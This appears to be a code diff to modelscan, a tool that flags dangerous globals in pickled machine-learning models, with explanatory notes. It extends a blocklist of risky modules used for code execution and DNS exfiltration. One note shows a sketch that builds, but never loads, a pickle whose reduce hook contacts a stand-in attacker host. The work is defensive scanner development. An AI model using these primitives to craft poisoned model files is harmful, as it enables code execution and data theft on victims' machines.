37 changes: 27 additions & 10 deletions modelscan/modelscan.py
@@ -98,18 +98,35 @@ def _iterate_models(self, model_path: Path) -> Generator[Model, None, None]:
                 with zipfile.ZipFile(model.get_stream(), "r") as zip:
                     file_names = zip.namelist()
                     for file_name in file_names:
-                        with zip.open(file_name, "r") as file_io:
-                            file_name = f"{model.get_source()}:{file_name}"
-                            if _is_zipfile(file_name, data=file_io):
-                                self._errors.append(
-                                    NestedZipError(
-                                        "ModelScan does not support nested zip files.",
-                                        Path(file_name),
+                        try:
+                            with zip.open(file_name, "r") as file_io:
+                                file_name = f"{model.get_source()}:{file_name}"
+                                if _is_zipfile(file_name, data=file_io):
+                                    self._errors.append(
+                                        NestedZipError(
+                                            "ModelScan does not support nested zip files.",
+                                            Path(file_name),
+                                        )
                                     )
-                                )
-                                continue
+                                    continue
 
-                        yield Model(file_name, file_io)
+                                yield Model(file_name, file_io)
+                        except (KeyError, RuntimeError, zipfile.BadZipFile) as e:
+                            logger.debug(
+                                "Skipping file %s in zip %s due to error",
+                                file_name,
+                                str(model.get_source()),
+                                exc_info=True,
+                            )
+                            self._skipped.append(
+                                ModelScanSkipped(
+                                    "ModelScan",
+                                    SkipCategories.BAD_ZIP,
+                                    f"Skipping file in zip due to error: {e}",
+                                    f"{model.get_source()}:{file_name}",
+                                )
+                            )
+                            continue
             except (zipfile.BadZipFile, RuntimeError) as e:
                 logger.debug(
                     "Skipping zip file %s, due to error",
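
Why the inner try/except matters: zip.open() and the subsequent read can fail per member (a bad member name raises KeyError, encrypted or unsupported entries raise RuntimeError, CRC or structural damage raises zipfile.BadZipFile), and previously one bad member aborted iteration of the whole archive. A minimal, standard-library-only repro sketch of the failure mode this change absorbs (the byte-flip corruption is illustrative):

import io
import zipfile

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("good.txt", b"hello")
    zf.writestr("bad.txt", b"world")

data = bytearray(buf.getvalue())
data[data.find(b"world")] ^= 0xFF  # corrupt one byte of bad.txt's stored payload
with zipfile.ZipFile(io.BytesIO(bytes(data))) as zf:
    for name in zf.namelist():
        try:
            with zf.open(name, "r") as member:
                member.read()  # raises zipfile.BadZipFile: Bad CRC-32 for 'bad.txt'
        except (KeyError, RuntimeError, zipfile.BadZipFile) as e:
            print(f"skipped {name}: {e}")  # the scan continues with the next member
        else:
            print(f"scanned {name}")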
32 changes: 32 additions & 0 deletions modelscan/settings.py
@@ -130,6 +130,38 @@ class SupportedModelFormats:
             "pdb": "*",
             "shutil": "*",
             "asyncio": "*",
+            "commands": "*",  # Python 2 precursor to subprocess
+            "functools": ["partial"],
+            "numpy.testing._private.utils": "*",
+            "ssl": "*",  # DNS exfiltration via ssl.get_server_certificate()
+            "ensurepip": ["_run_pip"],
+            "idlelib.autocomplete": ["AutoComplete.get_entity", "AutoComplete.fetch_completions"],
+            "idlelib.calltip": ["Calltip.fetch_tip", "get_entity"],
+            "idlelib.debugobj": ["ObjectTreeItem.SetText"],
+            "idlelib.pyshell": ["ModifiedInterpreter.runcode", "ModifiedInterpreter.runcommand"],
+            "idlelib.run": ["Executive.runcode"],
+            "lib2to3.pgen2.grammar": ["Grammar.loads"],
+            "lib2to3.pgen2.pgen": ["ParserGenerator.make_label"],
+            "code": ["InteractiveInterpreter.runcode"],
+            "cProfile": ["runctx", "run"],
+            "doctest": ["debug_script"],
+            "profile": ["Profile.run", "Profile.runctx"],
+            "pydoc": ["pipepager"],
+            "timeit": "*",
+            "trace": ["Trace.run", "Trace.runctx"],
+            "venv": "*",
+            "pip": "*",
+            # PyTorch-related risky globals
+            "torch._dynamo.guards": ["GuardBuilder.get"],
+            "torch._inductor.codecache": ["compile_file"],
+            "torch.fx.experimental.symbolic_shapes": ["ShapeEnv.evaluate_guards_expression"],
+            "torch.jit.unsupported_tensor_ops": ["execWrapper"],
+            "torch.serialization": ["load"],
+            "torch.utils._config_module": ["ConfigModule.load_config"],
+            "torch.utils.bottleneck.__main__": ["run_cprofile", "run_autograd_prof"],
+            "torch.utils.collect_env": ["run"],
+            "torch.utils.data.datapipes.utils.decoder": ["basichandlers"],
+            "asyncio.unix_events": ["_UnixSubprocessTransport._start"],
         },
         "HIGH": {
             "webbrowser": "*",  # Includes webbrowser.open()
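
These entries extend the CRITICAL blocklist of pickle globals that the scanner flags. As a hedged illustration of why an innocuous-looking module like ssl qualifies, the sketch below builds (but never loads) a pickle whose reduce hook resolves to ssl.get_server_certificate; the host and port are made up:

import pickle
import ssl

class CertProbe:
    def __reduce__(self):
        # Unpickling this would call ssl.get_server_certificate(("attacker.example", 443)),
        # i.e. open a network connection without any code being "executed" per se.
        return ssl.get_server_certificate, (("attacker.example", 443),)

payload = pickle.dumps(CertProbe())  # never passed to pickle.loads here
# pickletools.dis(payload) shows the global 'ssl get_server_certificate',
# which now matches the CRITICAL entry "ssl": "*".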
22 changes: 14 additions & 8 deletions modelscan/tools/picklescanner.py
@@ -55,17 +55,15 @@ def _list_globals(
     memo: Dict[Union[int, str], str] = {}
     # Scan the data for pickle buffers, stopping when parsing fails or stops making progress
     last_byte = b"dummy"
+    parsing_pkl_error: Optional[str] = None
     while last_byte != b"":
         # List opcodes
+        ops: List[Tuple[Any, Any, Union[int, None]]] = []
         try:
-            ops: List[Tuple[Any, Any, Union[int, None]]] = list(
-                pickletools.genops(data)
-            )
+            for op in pickletools.genops(data):
+                ops.append(op)
         except Exception as e:
-            # Given we can have multiple pickles in a file, we may have already successfully extracted globals from a valid pickle.
-            # Thus return the already found globals in the error & let the caller decide what to do.
-            globals_opt = globals if len(globals) > 0 else None
-            raise GenOpsError(str(e), globals_opt)
+            parsing_pkl_error = str(e)
 
         last_byte = data.read(1)
         data.seek(-1, 1)
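
The switch from list(pickletools.genops(data)) to an incremental loop preserves every opcode decoded before a parse failure, and the failure itself is now recorded in parsing_pkl_error and deferred until after the loop (see the last hunk of this file) instead of being raised immediately. A small sketch of the difference on a truncated pickle:

import io
import pickle
import pickletools

truncated = io.BytesIO(pickle.dumps({"a": 1})[:-2])  # chop off the trailing opcodes

ops = []
try:
    for op in pickletools.genops(truncated):
        ops.append(op)  # opcodes decoded before the failure are kept
except Exception as e:
    print(f"parse failed after {len(ops)} opcodes: {e}")
# With list(pickletools.genops(...)) the partial result would be lost:
# list() discards already-yielded items when the generator raises.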
@@ -84,7 +82,7 @@ def _list_globals(
                 globals.add(tuple(op_value.split(" ", 1)))
             elif op_name == "STACK_GLOBAL":
                 values: List[str] = []
-                for offset in range(1, n):
+                for offset in range(1, n + 1):
                     if ops[n - offset][0].name in [
                         "MEMOIZE",
                         "PUT",
@@ -99,6 +97,9 @@ def _list_globals(
                         "UNICODE",
                         "BINUNICODE",
                         "BINUNICODE8",
+                        "STRING",
+                        "BINSTRING",
+                        "SHORT_BINSTRING",
                     ]:
                         logger.debug(
                             "Presence of non-string opcode, categorizing as an unknown dangerous import"
@@ -116,6 +117,11 @@ def _list_globals(
         if not multiple_pickles:
             break
 
+    if parsing_pkl_error is not None:
+        # Return the already found globals in the error & let the caller decide what to do.
+        globals_opt = globals if len(globals) > 0 else None
+        raise GenOpsError(parsing_pkl_error, globals_opt)
+
     return globals
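
Net effect of deferring the raise: globals recovered from earlier pickles in a multi-pickle stream, and from the partially parsed one, are still scanned and attached to the GenOpsError instead of being thrown away mid-loop. A hedged sketch of the caller-side contract (the import path, the e.globals attribute inferred from the constructor above, and the print-based reporting are assumptions, not modelscan's real code):

from modelscan.tools.picklescanner import GenOpsError, _list_globals

def scan_stream(data):
    try:
        found = _list_globals(data)
    except GenOpsError as e:
        found = e.globals or set()  # salvage globals parsed before the failure
        print(f"pickle parse error, partial results kept: {e}")
    for module, name in sorted(found):
        print(f"global found: {module}.{name}")  # match against unsafe_globals settings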